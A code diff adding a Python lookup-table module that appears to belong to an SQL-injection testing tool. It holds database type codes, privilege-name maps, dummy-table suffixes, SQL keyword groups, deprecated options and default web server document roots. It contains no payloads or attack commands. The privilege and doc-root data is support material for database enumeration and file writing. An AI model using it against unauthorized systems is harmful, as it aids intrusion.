+from lib.core.settings import NULL
+from lib.core.settings import MSSQL_ALIASES
+from lib.core.settings import MYSQL_ALIASES
+from lib.core.settings import PGSQL_ALIASES
+from lib.core.settings import ORACLE_ALIASES
+from lib.core.settings import SQLITE_ALIASES
+from lib.core.settings import ACCESS_ALIASES
+from lib.core.settings import FIREBIRD_ALIASES
+from lib.core.settings import MAXDB_ALIASES
+from lib.core.settings import SYBASE_ALIASES
+from lib.core.settings import DB2_ALIASES
+from lib.core.settings import HSQLDB_ALIASES
+
+FIREBIRD_TYPES = {
+                    261: "BLOB",
+                    14: "CHAR",
+                    40: "CSTRING",
+                    11: "D_FLOAT",
+                    27: "DOUBLE",
+                    10: "FLOAT",
+                    16: "INT64",
+                    8: "INTEGER",
+                    9: "QUAD",
+                    7: "SMALLINT",
+                    12: "DATE",
+                    13: "TIME",
+                    35: "TIMESTAMP",
+                    37: "VARCHAR",
+                }
+
+SYBASE_TYPES = {
+                    14: "floatn",
+                    8: "float",
+                    15: "datetimn",
+                    12: "datetime",
+                    23: "real",
+                    28: "numericn",
+                    10: "numeric",
+                    27: "decimaln",
+                    26: "decimal",
+                    17: "moneyn",
+                    11: "money",
+                    21: "smallmoney",
+                    22: "smalldatetime",
+                    13: "intn",
+                    7: "int",
+                    6: "smallint",
+                    5: "tinyint",
+                    16: "bit",
+                    2: "varchar",
+                    18: "sysname",
+                    25: "nvarchar",
+                    1: "char",
+                    24: "nchar",
+                    4: "varbinary",
+                    80: "timestamp",
+                    3: "binary",
+                    19: "text",
+                    20: "image",
+                }
+
+MYSQL_PRIVS = {
+                    1: "select_priv",
+                    2: "insert_priv",
+                    3: "update_priv",
+                    4: "delete_priv",
+                    5: "create_priv",
+                    6: "drop_priv",
+                    7: "reload_priv",
+                    8: "shutdown_priv",
+                    9: "process_priv",
+                    10: "file_priv",
+                    11: "grant_priv",
+                    12: "references_priv",
+                    13: "index_priv",
+                    14: "alter_priv",
+                    15: "show_db_priv",
+                    16: "super_priv",
+                    17: "create_tmp_table_priv",
+                    18: "lock_tables_priv",
+                    19: "execute_priv",
+                    20: "repl_slave_priv",
+                    21: "repl_client_priv",
+                    22: "create_view_priv",
+                    23: "show_view_priv",
+                    24: "create_routine_priv",
+                    25: "alter_routine_priv",
+                    26: "create_user_priv",
+                }
+
+PGSQL_PRIVS = {
+                    1: "createdb",
+                    2: "super",
+                    3: "catupd",
+                }
+
+# Reference(s): http://stackoverflow.com/a/17672504
+#               http://docwiki.embarcadero.com/InterBase/XE7/en/RDB$USER_PRIVILEGES
+
+FIREBIRD_PRIVS = {
+                    "S": "SELECT",
+                    "I": "INSERT",
+                    "U": "UPDATE",
+                    "D": "DELETE",
+                    "R": "REFERENCE",
+                    "E": "EXECUTE",
+                    "X": "EXECUTE",
+                    "A": "ALL",
+                    "M": "MEMBER",
+                    "T": "DECRYPT",
+                    "E": "ENCRYPT",
+                    "B": "SUBSCRIBE",
+                }
+
+DB2_PRIVS = {
+                    1: "CONTROLAUTH",
+                    2: "ALTERAUTH",
+                    3: "DELETEAUTH",
+                    4: "INDEXAUTH",
+                    5: "INSERTAUTH",
+                    6: "REFAUTH",
+                    7: "SELECTAUTH",
+                    8: "UPDATEAUTH",
+           }
+
+DUMP_REPLACEMENTS = {" ": NULL, "": BLANK}
+
+DBMS_DICT = {
+                DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "mssql+pymssql"),
+                DBMS.MYSQL: (MYSQL_ALIASES, "python pymysql", "https://github.com/petehunt/PyMySQL/", "mysql"),
+                DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"),
+                DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "http://cx-oracle.sourceforge.net/", "oracle"),
+                DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "http://packages.ubuntu.com/quantal/python-sqlite", "sqlite"),
+                DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "http://pyodbc.googlecode.com/", "access"),
+                DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"),
+                DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
+                DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"),
+                DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/", "ibm_db_sa"),
+                DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None),
+            }
+
+FROM_DUMMY_TABLE = {
+                        DBMS.ORACLE: " FROM DUAL",
+                        DBMS.ACCESS: " FROM MSysAccessObjects",
+                        DBMS.FIREBIRD: " FROM RDB$DATABASE",
+                        DBMS.MAXDB: " FROM VERSIONS",
+                        DBMS.DB2: " FROM SYSIBM.SYSDUMMY1",
+                        DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS"
+                   }
+
+SQL_STATEMENTS = {
+                        "SQL SELECT statement":  (
+                             "select ",
+                             "show ",
+                             " top ",
+                             " distinct ",
+                             " from ",
+                             " from dual",
+                             " where ",
+                             " group by ",
+                             " order by ",
+                             " having ",
+                             " limit ",
+                             " offset ",
+                             " union all ",
+                             " rownum as ",
+                             "(case ",           ),
+
+                         "SQL data definition":  (
+                             "create ",
+                             "declare ",
+                             "drop ",
+                             "truncate ",
+                             "alter ",           ),
+
+                        "SQL data manipulation": (
+                             "bulk ",
+                             "insert ",
+                             "update ",
+                             "delete ",
+                             "merge ",
+                             "load ",            ),
+
+                        "SQL data control":      (
+                             "grant ",
+                             "revoke ",          ),
+
+                        "SQL data execution":    (
+                             "exec ",
+                             "execute ",
+                             "values ", 
+                             "call ",            ),
+
+                        "SQL transaction":       (
+                             "start transaction ",
+                             "begin work ",
+                             "begin transaction ",
+                             "commit ",
+                             "rollback ",        ),
+                     }
+
+POST_HINT_CONTENT_TYPES = {
+                                POST_HINT.JSON: "application/json",
+                                POST_HINT.JSON_LIKE: "application/json",
+                                POST_HINT.MULTIPART: "multipart/form-data",
+                                POST_HINT.SOAP: "application/soap+xml",
+                                POST_HINT.XML: "application/xml",
+                                POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8",
+                          }
+
+DEPRECATED_OPTIONS = {
+                        "--replicate": "use '--dump-format=SQLITE' instead",
+                        "--no-unescape": "use '--no-escape' instead",
+                        "--binary": "use '--binary-fields' instead",
+                        "--auth-private": "use '--auth-file' instead",
+                        "--check-payload": None,
+                        "--check-waf": None,
+                     }
+
+DUMP_DATA_PREPROCESS = {
+                            DBMS.ORACLE: {"XMLTYPE": "(%s).getStringVal()"},  # Reference: https://www.tibcommunity.com/docs/DOC-3643
+                            DBMS.MSSQL: {"IMAGE": "CONVERT(VARBINARY(MAX),%s)"},
+                       }
+
+DEFAULT_DOC_ROOTS = {
+                        OS.WINDOWS: ("C:/xampp/htdocs/", "C:/Inetpub/wwwroot/"),
+                        OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default")  # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
+                    }